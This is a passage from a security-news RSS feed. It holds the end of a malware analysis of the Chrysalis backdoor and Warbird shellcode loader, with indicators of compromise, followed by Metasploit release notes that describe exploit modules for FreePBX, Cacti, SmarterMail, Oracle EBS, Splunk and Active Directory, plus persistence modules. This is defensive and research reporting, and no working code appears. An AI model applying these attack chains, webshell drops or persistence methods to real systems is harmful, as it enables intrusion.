</strong></span><span>These resources confirm IDA misinterpretation of the argument which should be </span><span><span data-type="inlineCode"><strong>SystemCodeFlowTransition</strong></span></span><span>, a necessary argument to invoke Warbird functionality. Additionally, DownWithUp’s blog post mentioned the possible operations:</span></p><p>⠀</p><figure><div><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltc3eb7e9c08aca2f0/6980c55fef7b8950faaca1b2/lotus-blossom-Warbird-operations-documented-by-DownWithUp.png" alt="lotus-blossom-Warbird-operations-documented-by-DownWithUp.png" caption="Figure 12: Warbird operations documented by DownWithUp" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="lotus-blossom-Warbird-operations-documented-by-DownWithUp.png" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltc3eb7e9c08aca2f0/6980c55fef7b8950faaca1b2/lotus-blossom-Warbird-operations-documented-by-DownWithUp.png" data-sys-asset-uid="bltc3eb7e9c08aca2f0" data-sys-asset-filename="lotus-blossom-Warbird-operations-documented-by-DownWithUp.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 12: Warbird operations documented by DownWithUp" data-sys-asset-alt="lotus-blossom-Warbird-operations-documented-by-DownWithUp.png" data-sys-asset-position="none" sys-style-type="display"><figcaption>Figure 12: Warbird operations documented by DownWithUp</figcaption></div></figure><p>⠀</p><p><span>Referring to the snippet we saw  from </span><span><em>“ConsoleApplication2.exe”</em></span><span>, the operation is equal to </span><span><span data-type="inlineCode"><strong>WbHeapExecuteCall</strong></span></span><span><strong> </strong></span><span>which gives us the answer on how the shellcode gained execution. Thanks to work of other researchers, we also know that this technique only works if the code resides inside of memory of Microsoft signed binary, thus revealing why </span><span><span data-type="inlineCode"><strong>clipc.dll</strong></span></span><span><strong> </strong></span><span>has been used.</span><span><strong> </strong></span><span>The blog post from </span><span><span data-type="inlineCode"><strong>cirosec</strong></span></span><span><strong> </strong></span><span>also contains a link for their </span><a href="https://github.com/cirosec/warbird-demos/blob/main/Loader/Loader.cpp"><span>POC</span></a><span> of this technique which is almost the same replica of </span><span><em>“ConsoleApplication2.exe”</em></span><span>, hinting that author of </span><span><em>“ConsoleApplication2.exe”</em></span><span> simply copied it and modified to execute </span><span><span data-type="inlineCode"><strong>Metasploit block_api</strong></span></span><span> shellcode instead of the benign calc from POC. The comparison of the Cobalt Strike beacon configuration delivered via </span><span><em><strong>“</strong></em></span><span><em>conf.c</em></span><span><em><strong>”</strong></em></span><span><em> </em></span><span>and </span><span><em>“ConsoleApplication2.exe”</em></span><span> revealed shared trades between these two, most notably </span><span><span data-type="inlineCode"><strong>domain</strong></span></span><span>, </span><span><span data-type="inlineCode"><strong>public key</strong></span></span><span><strong>,</strong></span><span> and </span><span><span data-type="inlineCode"><strong>process injection technique</strong></span></span><span>.</span></p><h2>Attribution</h2><p><span>Attribution is primarily based on strong similarities between the initial loader observed in this intrusion and previously published </span><a href="https://sed-cms.broadcom.com/system/files/threat-hunter-whitepaper/2025-04/2025_04_ChinaLinked_Espionage_Actors.pdf"><span>Symantec</span></a><span> research. Particularly the use of a renamed </span><span><em>“Bitdefender Submission Wizard”</em></span><span> to side-load </span><span><em>“log.dll”</em></span><span> for decrypting and executing an additional payload.</span><br><span>In addition, similarities of the execution chain of </span><span><em>“conf.c”</em></span><span> retrieved from the infected asset and other loaders that we found, supported by the same </span><span><span data-type="inlineCode"><strong>public key</strong></span></span><span> extracted from CS beacons delivered through </span><span><em>“conf.c”</em></span><span> and </span><span><em>“ConsoleApplication2.exe”</em></span><span> suggests with moderate confidence, that the threat actor behind this campaign is likely Lotus Blossom.</span></p><h2>Conclusion</h2><p>The discovery of the <span data-type="inlineCode">Chrysalis</span> backdoor and the <span data-type="inlineCode">Warbird</span> loader highlights an evolution in Billbug’s capabilities. While the group continues to rely on proven techniques like DLL sideloading and service persistence, their multi layered shellcode loader and integration of undocumented system calls (NtQuerySystemInformation) marks a clear shift toward more resilient and stealth tradecraft.</p><p>What stands out is the mix of tools: the deployment of custom malware (Chrysalis) alongside commodity frameworks like Metasploit and Cobalt Strike, together with the rapid adaptation of public research (specifically the abuse of Microsoft Warbird). This demonstrates that Billbug is actively updating their playbook to stay ahead of modern detection.</p><h2>Rapid7 Customers</h2><h3>Intelligence Hub</h3><p><span>Customers using Rapid7’s Intelligence Hub gain direct access to Chrysalis backdoor, Metasploit loaders and Cobalt Strike IOCs, including any future indicators as they are identified.</span></p><h2>Indicators of compromise (IoCs)</h2><h3>File indicators</h3><table><tbody><tr><td><p>update.exe</p></td><td><p>a511be5164dc1122fb5a7daa3eef9467e43d8458425b15a640235796006590c9</p></td></tr><tr><td><p>[NSIS.nsi]</p></td><td><p>8ea8b83645fba6e23d48075a0d3fc73ad2ba515b4536710cda4f1f232718f53e</p></td></tr><tr><td><p>BluetoothService.exe</p></td><td><p>2da00de67720f5f13b17e9d985fe70f10f153da60c9ab1086fe58f069a156924</p></td></tr><tr><td><p>BluetoothService</p></td><td><p>77bfea78def679aa1117f569a35e8fd1542df21f7e00e27f192c907e61d63a2e</p></td></tr><tr><td><p>log.dll</p></td><td><p>3bdc4c0637591533f1d4198a72a33426c01f69bd2e15ceee547866f65e26b7ad</p></td></tr><tr><td><p>u.bat</p></td><td><p>9276594e73cda1c69b7d265b3f08dc8fa84bf2d6599086b9acc0bb3745146600</p></td></tr><tr><td><p>conf.c</p></td><td><p>f4d829739f2d6ba7e3ede83dad428a0ced1a703ec582fc73a4eee3df3704629a</p></td></tr><tr><td><p>libtcc.dll</p></td><td><p>4a52570eeaf9d27722377865df312e295a7a23c3b6eb991944c2ecd707cc9906</p></td></tr><tr><td><p>admin</p></td><td><p>831e1ea13a1bd405f5bda2b9d8f2265f7b1db6c668dd2165ccc8a9c4c15ea7dd</p></td></tr><tr><td><p>loader1</p></td><td><p>0a9b8df968df41920b6ff07785cbfebe8bda29e6b512c94a3b2a83d10014d2fd</p></td></tr><tr><td><p>uffhxpSy</p></td><td><p>4c2ea8193f4a5db63b897a2d3ce127cc5d89687f380b97a1d91e0c8db542e4f8</p></td></tr><tr><td><p>loader2</p></td><td><p>e7cd605568c38bd6e0aba31045e1633205d0598c607a855e2e1bca4cca1c6eda</p></td></tr><tr><td><p>3yzr31vk</p></td><td><p>078a9e5c6c787e5532a7e728720cbafee9021bfec4a30e3c2be110748d7c43c5</p></td></tr><tr><td><p>ConsoleApplication2.exe</p></td><td><p>b4169a831292e245ebdffedd5820584d73b129411546e7d3eccf4663d5fc5be3</p></td></tr><tr><td><p>system</p></td><td><p>7add554a98d3a99b319f2127688356c1283ed073a084805f14e33b4f6a6126fd</p></td></tr><tr><td><p>s047t5g.exe</p></td><td><p>fcc2765305bcd213b7558025b2039df2265c3e0b6401e4833123c461df2de51a</p></td></tr></tbody></table><h3>Network indicators</h3><table><tbody><tr><td><p>95.179.213.0</p></td></tr><tr><td><a href="http://api.skycloudcenter.com/">api.skycloudcenter.com</a></td></tr><tr><td><a href="http://api.wiresguard.com/">api.wiresguard.com</a></td></tr><tr><td><p>61.4.102.97</p></td></tr><tr><td><p>59.110.7.32</p></td></tr><tr><td><p>124.222.137.114</p></td></tr></tbody></table><h3>MITRE TTPs</h3><table><tbody><tr><td><p><strong>ATT&amp;CK ID</strong></p></td><td><p><strong>Name</strong></p></td></tr><tr><td><p>T1204.002</p></td><td><p>User Execution: Malicious File</p></td></tr><tr><td><p>T1036</p></td><td><p>Masquerading</p></td></tr><tr><td><p>T1027</p></td><td><p>Obfuscated Files or Information</p></td></tr><tr><td><p>T1027.007</p></td><td><p>Obfuscated Files or Information: Dynamic API Resolution</p></td></tr><tr><td><p>T1140</p></td><td><p>Deobfuscate/Decode Files or Information</p></td></tr><tr><td><p>T1574.002</p></td><td><p>DLL Side-Loading</p></td></tr><tr><td><p>T1106</p></td><td><p>Native API</p></td></tr><tr><td><p>T1055</p></td><td><p>Process Injection</p></td></tr><tr><td><p>T1620</p></td><td><p>Reflective Code Loading</p></td></tr><tr><td><p>T1059.003</p></td><td><p>Command and Scripting Interpreter: Windows Command Shell</p></td></tr><tr><td><p>T1083</p></td><td><p>File and Directory Discovery</p></td></tr><tr><td><p>T1005</p></td><td><p>Data from Local System</p></td></tr><tr><td><p>T1105</p></td><td><p>Ingress Tool Transfer</p></td></tr><tr><td><p>T1041</p></td><td><p>Exfiltration Over C2 Channel</p></td></tr><tr><td><p>T1071.001</p></td><td><p>Application Layer Protocol: Web Protocols (HTTP/HTTPS)</p></td></tr><tr><td><p>T1573</p></td><td><p>Encrypted Channel</p></td></tr><tr><td><p>T1547.001</p></td><td><p>Boot or Logon Autostart Execution: Registry Run Keys</p></td></tr><tr><td><p>T1543.003</p></td><td><p>Create or Modify System Process: Windows Service</p></td></tr><tr><td><p>T1480.002</p></td><td><p>Execution Guardrails: Mutual Exclusion</p></td></tr><tr><td><p>T1070.004</p></td><td><p>Indicator Removal on Host: File Deletion</p></td></tr></tbody></table><p><span></span></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Metasploit Update Introduces 7 Exploit Modules Affecting Popular Enterprise Platforms]]></title>
<description><![CDATA[A significant Metasploit Framework update (version 6.4.111) featuring seven new exploit modules that target critical vulnerabilities across widely deployed enterprise systems. This release demonstrates the increasing sophistication of attack chains leveraging authentication bypass vulnerabilities...]]></description>
<link>https://tsecurity.de/de/3245783/it-security-nachrichten/metasploit-update-introduces-7-exploit-modules-affecting-popular-enterprise-platforms/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3245783/it-security-nachrichten/metasploit-update-introduces-7-exploit-modules-affecting-popular-enterprise-platforms/</guid>
<pubDate>Sat, 31 Jan 2026 16:19:28 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A significant Metasploit Framework update (version 6.4.111) featuring seven new exploit modules that target critical vulnerabilities across widely deployed enterprise systems. This release demonstrates the increasing sophistication of attack chains leveraging authentication bypass vulnerabilities chained with subsequent code execution techniques.…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/metasploit-update-introduces-7-exploit-modules-affecting-popular-enterprise-platforms/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/metasploit-update-introduces-7-exploit-modules-affecting-popular-enterprise-platforms/">Metasploit Update Introduces 7 Exploit Modules Affecting Popular Enterprise Platforms</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Metasploit Releases 7 New Exploit Modules covering FreePBX, Cacti and SmarterMail]]></title>
<description><![CDATA[The latest update to the Metasploit Framework this week provides a significant enhancement for penetration testers and red teamers, introducing seven new exploit modules targeting commonly used enterprise software. The highlight of this release is a sophisticated trio of modules…
Read more →
The ...]]></description>
<link>https://tsecurity.de/de/3245362/it-security-nachrichten/metasploit-releases-7-new-exploit-modules-covering-freepbx-cacti-and-smartermail/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3245362/it-security-nachrichten/metasploit-releases-7-new-exploit-modules-covering-freepbx-cacti-and-smartermail/</guid>
<pubDate>Sat, 31 Jan 2026 10:21:18 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The latest update to the Metasploit Framework this week provides a significant enhancement for penetration testers and red teamers, introducing seven new exploit modules targeting commonly used enterprise software. The highlight of this release is a sophisticated trio of modules…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/metasploit-releases-7-new-exploit-modules-covering-freepbx-cacti-and-smartermail/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/metasploit-releases-7-new-exploit-modules-covering-freepbx-cacti-and-smartermail/">Metasploit Releases 7 New Exploit Modules covering FreePBX, Cacti and SmarterMail</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Metasploit Releases 7 New Exploit Modules covering FreePBX, Cacti and SmarterMail]]></title>
<description><![CDATA[The latest update to the Metasploit Framework this week provides a significant enhancement for penetration testers and red teamers, introducing seven new exploit modules targeting commonly used enterprise software. The highlight of this release is a sophisticated trio of modules directed at FreeP...]]></description>
<link>https://tsecurity.de/de/3245340/it-security-nachrichten/metasploit-releases-7-new-exploit-modules-covering-freepbx-cacti-and-smartermail/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3245340/it-security-nachrichten/metasploit-releases-7-new-exploit-modules-covering-freepbx-cacti-and-smartermail/</guid>
<pubDate>Sat, 31 Jan 2026 10:08:00 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The latest update to the Metasploit Framework this week provides a significant enhancement for penetration testers and red teamers, introducing seven new exploit modules targeting commonly used enterprise software. The highlight of this release is a sophisticated trio of modules directed at FreePBX, alongside critical remote code execution (RCE) capabilities for Cacti and SmarterMail. This […]</p>
<p>The post <a href="https://cybersecuritynews.com/metasploit-exploit-modules/">Metasploit Releases 7 New Exploit Modules covering FreePBX, Cacti and SmarterMail</a> appeared first on <a href="https://cybersecuritynews.com/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Metasploit Wrap-Up 01/30/2026]]></title>
<description><![CDATA[FreeBPX Content GaloreThis week brings 3 new pieces of module content for targeting FreePBX. All three chain multiple vulnerabilities together, starting with CVE-2025-66039. This initial vulnerability allows unauthenticated users to bypass the authentication process to interact with FreePBX. From...]]></description>
<link>https://tsecurity.de/de/3244868/it-security-nachrichten/metasploit-wrap-up-01302026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3244868/it-security-nachrichten/metasploit-wrap-up-01302026/</guid>
<pubDate>Fri, 30 Jan 2026 22:20:40 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>FreeBPX Content Galore</h2><p>This week brings 3 new pieces of module content for targeting FreePBX. All three chain multiple vulnerabilities together, starting with CVE-2025-66039. This initial vulnerability allows unauthenticated users to bypass the authentication process to interact with FreePBX. From this point, the different modules leverage either a SQL injection vulnerability (CVE-2025-61675) or a file upload vulnerability (CVE-2025-61678) to obtain remote code execution.</p><h2>New module content (7)</h2><h3>FreePBX endpoint SQLi to RCE</h3><p>Authors: Noah King and msutovsky-r7 Type: Exploit Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20857">#20857</a> contributed by <a href="https://github.com/msutovsky-r7">msutovsky-r7</a> Path: unix/http/freepbx_custom_extension_rce AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2025-61675&amp;referrer=blog">CVE-2025-61675</a></p><p>Description: This adds exploit module for FreePBX which chains an authentication bypass, CVE-2025-66039, with a SQLi, CVE-2025-61675, which allows for a cron job to be added to the cron_job table of the database to allow for Remote Code Execution.</p><h3>FreePBX firmware file upload</h3><p>Authors: Noah King and msutovsky-r7 Type: Exploit Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20858">#20858</a> contributed by <a href="https://github.com/msutovsky-r7">msutovsky-r7</a> Path: unix/http/freepbx_firmware_file_upload AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2025-61678&amp;referrer=blog">CVE-2025-61678</a></p><p>Description: This adds exploit module for FreePBX which chains an authentication bypass, CVE-2025-66039, with an unrestricted file upload (via firmware upload), CVE-2025-61678, which allows for a webshell to be uploaded to the webserver resulting in remote code execution.</p><h3>FreePBX Custom Extension SQL Injection</h3><p>Authors: Noah King and msutovsky-r7 Type: Auxiliary Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20846">#20846</a> contributed by <a href="https://github.com/msutovsky-r7">msutovsky-r7</a> Path: gather/freepbx_custom_extension_injection AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2025-61675&amp;referrer=blog">CVE-2025-61675</a></p><p>Description: This adds an exploit module for FreePBX which chains an authentication bypass, (CVE-2025-66039) with an SQLi (CVE-2025-61675) to create an admin user in the database.</p><h3>Cacti Graph Template authenticated RCE versions prior to 1.2.29</h3><p>Authors: Jack Heysel and chutchut Type: Exploit Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20799">#20799</a> contributed by <a href="https://github.com/jheysel-r7">jheysel-r7</a> Path: multi/http/cacti_graph_template_rce AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2025-24367&amp;referrer=blog">CVE-2025-24367</a></p><p>Description: This adds an exploit for CVE-2025-24367 which is an unauthenticated RCE in Cacti.</p><h3>SmarterTools SmarterMail GUID File Upload Vulnerability</h3><p>Authors: Piotr Bazydlo, Sina Kheirkhah, and jheysel-r7 Type: Exploit Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20866">#20866</a> contributed by <a href="https://github.com/jheysel-r7">jheysel-r7</a> Path: multi/http/smartermail_guid_file_upload AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2025-52691&amp;referrer=blog">CVE-2025-52691</a></p><p>Description: This adds a module for unauthenticated file upload in SmarterTools SmaterMail (CVE-2025-52691). The vulnerability allows an unauthenticated user to upload a file to any location on the system using path traversal using the guid variable. The module will either drop a webshell in the webroot directory (if the target is Windows) or create a cron job by dropping a file in /etc/cron.d (if the target is Linux).</p><h3>Burp Extension Persistence</h3><p>Author: h00die Type: Exploit Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/19821">#19821</a> contributed by <a href="https://github.com/h00die">h00die</a> Path: multi/persistence/burp_extension</p><p>Description: This adds a new persistence module for BurpSuite. The module adds a malicious extension to both the Pro and Community versions, which is triggered when the user starts BurpSuite.</p><h3>SSH Key Persistence</h3><p>Authors: Dean Welch <a href="mailto:dean_welch@rapid7.com">dean_welch@rapid7.com</a> and h00die <a href="mailto:mike@shorebreaksecurity.com">mike@shorebreaksecurity.com</a> Type: Exploit Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20778">#20778</a> contributed by <a href="https://github.com/h00die">h00die</a> Path: multi/persistence/ssh_key</p><p>Description: Combines the Windows and Linux ssh key persistence modules.</p><h2>Enhancements and features (1)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/20778">#20778</a> from <a href="https://github.com/h00die">h00die</a> - Combines the Windows and Linux ssh key persistence modules.</li></ul><h2>Bugs fixed (3)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/20897">#20897</a> from <a href="https://github.com/h00die">h00die</a> - This fixes a bug that was preventing collected hash data from being formatted as input for the John the Ripper cracker. The result is that users can now once again crack passwords using John.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20902">#20902</a> from <a href="https://github.com/rudraditya21">rudraditya21</a> - This fixes a bug in the auxiliary/scanner/ssh/ssh_login module that would incorrectly state that a login failed when it in fact succeeded but the module was unable to open a session. This was only an issue when the CreateSession option is true.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20909">#20909</a> from <a href="https://github.com/adfoster-r7">adfoster-r7</a> - Fixes a bug in Metasploit Pro that reported false positives for HTTP bruteforcing.</li></ul><h2>Documentation</h2><p>You can find the latest Metasploit documentation on our docsite at <a href="https://docs.metasploit.com/">docs.metasploit.com</a>.</p><h2>Get it</h2><p>As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:</p><ul><li><a href="https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222026-01-22T00%3A20%3A35Z..2026-01-29T15%3A38%3A16Z%22">Pull Requests 6.4.110...6.4.111</a></li><li><a href="https://github.com/rapid7/metasploit-framework/compare/6.4.110...6.4.111">Full diff 6.4.110...6.4.111</a></li></ul><p>If you are a git user, you can clone the <a href="https://github.com/rapid7/metasploit-framework">Metasploit Framework repo</a> (master branch) for the latest. To install fresh without using git, you can use the open-source-only <a href="https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers">Nightly Installers</a> or the commercial edition <a href="https://www.rapid7.com/products/metasploit/download/">Metasploit Pro</a></p><p></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Metasploit Wrap-Up 01/23/2026]]></title>
<description><![CDATA[Oracle E-Business Suite Unauth RCEThis week, we are pleased to announce the addition of a module that exploits CVE-2025-61882, a pre-authentication remote code execution vulnerability in Oracle E-Business Suite versions 12.2.3 through 12.2.14. The exploit chains multiple flaws—including SSRF, pat...]]></description>
<link>https://tsecurity.de/de/3231137/it-security-nachrichten/metasploit-wrap-up-01232026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3231137/it-security-nachrichten/metasploit-wrap-up-01232026/</guid>
<pubDate>Fri, 23 Jan 2026 22:20:32 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>Oracle E-Business Suite Unauth RCE</h2><p>This week, we are pleased to announce the addition of a module that exploits CVE-2025-61882, a pre-authentication remote code execution vulnerability in Oracle E-Business Suite versions 12.2.3 through 12.2.14. The exploit chains multiple flaws—including SSRF, path traversal, HTTP request smuggling, and XSLT injection—to coerce the target into fetching and executing a malicious XSL file hosted by the attacker. Successful exploitation results in arbitrary command execution and an interactive shell on both Linux/Unix and Windows targets. The module is reliable, repeatable, and we here at Metasploit hope you enjoy it, happy hacking!</p><h2>New module content (3)</h2><h3>Authenticated RCE in Splunk (splunk_archiver app)</h3><p>Authors: Alex Hordijk, Maksim Rogov, and psytester Type: Exploit Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20770">#20770</a> contributed by <a href="https://github.com/vognik">vognik</a> Path: linux/http/splunk_auth_rce_cve_2024_36985 AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2024-36985&amp;referrer=blog">CVE-2024-36985</a></p><p>Description: This adds two separate Metasploit exploit modules targeting Remote Code Execution (RCE) vulnerabilities in Splunk Enterprise. CVE-2024-36985 exploits unsafe use of the "copybuckets" lookup function within the splunk_archiver application, resulting in execution of the sudobash helper script with attacker-controlled arguments. Affected versions: All releases prior to 9.0.10, 9.1.2 through 9.1.5, 9.2.0 through 9.2.2 CVE-2022-43571, exploits a Python code injection vulnerability in Splunk SimpleXML dashboards by injecting malicious code into sparkline style parameters. Malicious code is executed when a user exports the dashboard to PDF. Affected versions: All releases prior to 8.1.12, 8.2.0 through 8.2.9, 9.0.0 through 9.0.2.</p><h3>Oracle E-Business Suite CVE-2025-61882 RCE</h3><p>Authors: Mathieu Dupas and watchTowr (Sonny, Sina Kheirkhah, Jake Knott) Type: Exploit Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20750">#20750</a> contributed by <a href="https://github.com/MatDupas">MatDupas</a> Path: multi/http/oracle_ebs_cve_2025_61882_exploit_rce AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2025-61882&amp;referrer=blog">CVE-2025-61882</a></p><p>Description: This adds an exploit for CVE-2025-61882, a critical Remote Code Execution (RCE) vulnerability in Oracle E-Business Suite (EBS). The flaw allows unauthenticated attackers to execute arbitrary code by leveraging a combination of SSRF, HTTP request smuggling and XSLT injection. Affected Versions: Oracle E-Business Suite, 12.2.3-12.2.14.</p><h3>Authenticated RCE in Splunk (SimpleXML dashboard PDF generation)</h3><p>Authors: Danylo Dmytriiev, Maksim Rogov, and psytester Type: Exploit Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20770">#20770</a> contributed by <a href="https://github.com/vognik">vognik</a> Path: multi/http/splunk_auth_rce_cve_2022_43571 AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2022-43571&amp;referrer=blog">CVE-2022-43571</a></p><p>Description: This adds two separate Metasploit exploit modules targeting Remote Code Execution (RCE) vulnerabilities in Splunk Enterprise. CVE-2024-36985 exploits unsafe use of the "copybuckets" lookup function within the splunk_archiver application, resulting in execution of the sudobash helper script with attacker-controlled arguments. Affected versions: All releases prior to 9.0.10, 9.1.2 through 9.1.5, 9.2.0 through 9.2.2 CVE-2022-43571, exploits a Python code injection vulnerability in Splunk SimpleXML dashboards by injecting malicious code into sparkline style parameters. Malicious code is executed when a user exports the dashboard to PDF. Affected versions: All releases prior to 8.1.12, 8.2.0 through 8.2.9, 9.0.0 through 9.0.2.</p><h2>Enhancements and features (3)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/20755">#20755</a> from <a href="https://github.com/rudraditya21">rudraditya21</a> - This adds an advanced datastore option, KrbClockSkew, to modules that use Kerberos authentication, allowing operators to adjust the Kerberos clock from the Metasploit side to fix clock skew errors.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20840">#20840</a> from <a href="https://github.com/xaitax">xaitax</a> - This updates the MongoBleed auxiliary module and adds new options. The module can now use Wiz Magic Packet to detect the vulnerability quickly; it can detect compression libraries used by MongoDB (and warns or stops the user if zlib is not enabled). The module can also reuse the MongoDB socket connection during memory scanning, which significantly improves performance. Finally, it can better leak secrets, either by pattern matching or by storing the extracted information in raw or JSON format.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20861">#20861</a> from <a href="https://github.com/bcoles">bcoles</a> - Adds multiple improvements to get_hostname resolution logic for post exploitation modules.</li></ul><h2>Bugs fixed (1)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/20888">#20888</a> from <a href="https://github.com/jheysel-r7">jheysel-r7</a> - Fixes an issue that caused dMSA kerberos authentication to fail.</li></ul><h2>Documentation</h2><p>You can find the latest Metasploit documentation on our docsite at <a href="https://docs.metasploit.com/">docs.metasploit.com</a>.</p><h2>Get it</h2><p>As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:</p><ul><li><a href="https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222026-01-16T22%3A44%3A19Z..2026-01-22T00%3A20%3A35Z%22">Pull Requests 6.4.108...6.4.110</a></li><li><a href="https://github.com/rapid7/metasploit-framework/compare/6.4.108...6.4.110">Full diff 6.4.108...6.4.110</a></li></ul><p>If you are a git user, you can clone the <a href="https://github.com/rapid7/metasploit-framework">Metasploit Framework repo</a> (master branch) for the latest. To install fresh without using git, you can use the open-source-only <a href="https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers">Nightly Installers</a> or the commercial edition <a href="https://www.rapid7.com/products/metasploit/download/">Metasploit Pro</a></p><p></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Metasploit Wrap-Up 01/16/2026]]></title>
<description><![CDATA[Persistence, dMSA Abuse & RCE GoodiesThis week, we have received a lot of contributions from the community, such as h00die, Chocapikk and countless others, which is greatly appreciated. This week’s modules and improvements in Metasploit Framework range from new modules, such as dMSA Abuse (result...]]></description>
<link>https://tsecurity.de/de/3223899/it-security-nachrichten/metasploit-wrap-up-01162026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3223899/it-security-nachrichten/metasploit-wrap-up-01162026/</guid>
<pubDate>Tue, 20 Jan 2026 16:50:58 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>Persistence, dMSA Abuse &amp; RCE Goodies</h2><p>This week, we have received a lot of contributions from the community, such as <a href="https://github.com/h00die">h00die</a>, <a href="https://github.com/Chocapikk">Chocapikk</a> and countless others, which is greatly appreciated. This week’s modules and improvements in Metasploit Framework range from new modules, such as dMSA Abuse (resulting in escalation of privilege in Windows Active Directory environments), authenticated and unauthenticated RCE modules, as well as many improvements and additions to the persistence modules and techniques.</p><h2>New module content (13)</h2><h3>BadSuccessor: dMSA abuse to Escalate Privileges in Windows Active Directory</h3><p>Authors: AngelBoy, Spencer McIntyre, and jheysel-r7 </p><p>Type: Auxiliary </p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20472">#20472</a> contributed by <a href="https://github.com/jheysel-r7">jheysel-r7</a> </p><p>Path: <span data-type="inlineCode">admin/ldap/bad_successor</span></p><p>Description: This adds an exploit for "BadSuccessor" which is a vulnerability whereby a user with permissions to an Organizational Unit (OU) in Active Directory can create a Delegated Managed Service Account (dMSA) account in such a way that it can lead to the issuance of a Kerberos ticket for an arbitrary user.</p><h3>Control Web Panel /admin/index.php Unauthenticated RCE</h3><p>Authors: Egidio Romano and Lukas Johannes Möller </p><p>Type: Exploit </p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20806">#20806</a> contributed by <a href="https://github.com/JohannesLks">JohannesLks</a> </p><p>Path: <span data-type="inlineCode">linux/http/control_web_panel_api_cmd_exec</span> </p><p>AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2025-67888&amp;referrer=blog">CVE-2025-67888</a></p><p>Description: This adds a new module for Control Web Panel (CVE-2025-67888). The vulnerability is unauthenticated OS command injection through an exposed API. The modules require Softaculous to be installed.</p><h3>Prison Management System 1.0 Authenticated RCE via Unrestricted File Upload</h3><p>Author: Alexandru Ionut Raducu </p><p>Type: Exploit </p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20811">#20811</a> contributed by <a href="https://github.com/Xorriath">Xorriath</a> </p><p>Path: <span data-type="inlineCode">linux/http/prison_management_rce</span> </p><p>AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2024-48594&amp;referrer=blog">CVE-2024-48594</a></p><p>Description: This adds a new module for Prison Management System 1.0 (CVE-2024-48594). The module requires admin credentials, which are subsequently used to exploit unrestricted file upload to upload a webshell.</p><h3>udev Persistence</h3><p>Author: Julien Voisin </p><p>Type: Exploit </p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20796">#20796</a> contributed by <a href="https://github.com/h00die">h00die</a> </p><p>Path: <span data-type="inlineCode">linux/persistence/udev</span></p><p>Description: This moves the udev persistence module into the persistence category and adds the persistence mixin.</p><h3>n8n Workflow Expression Remote 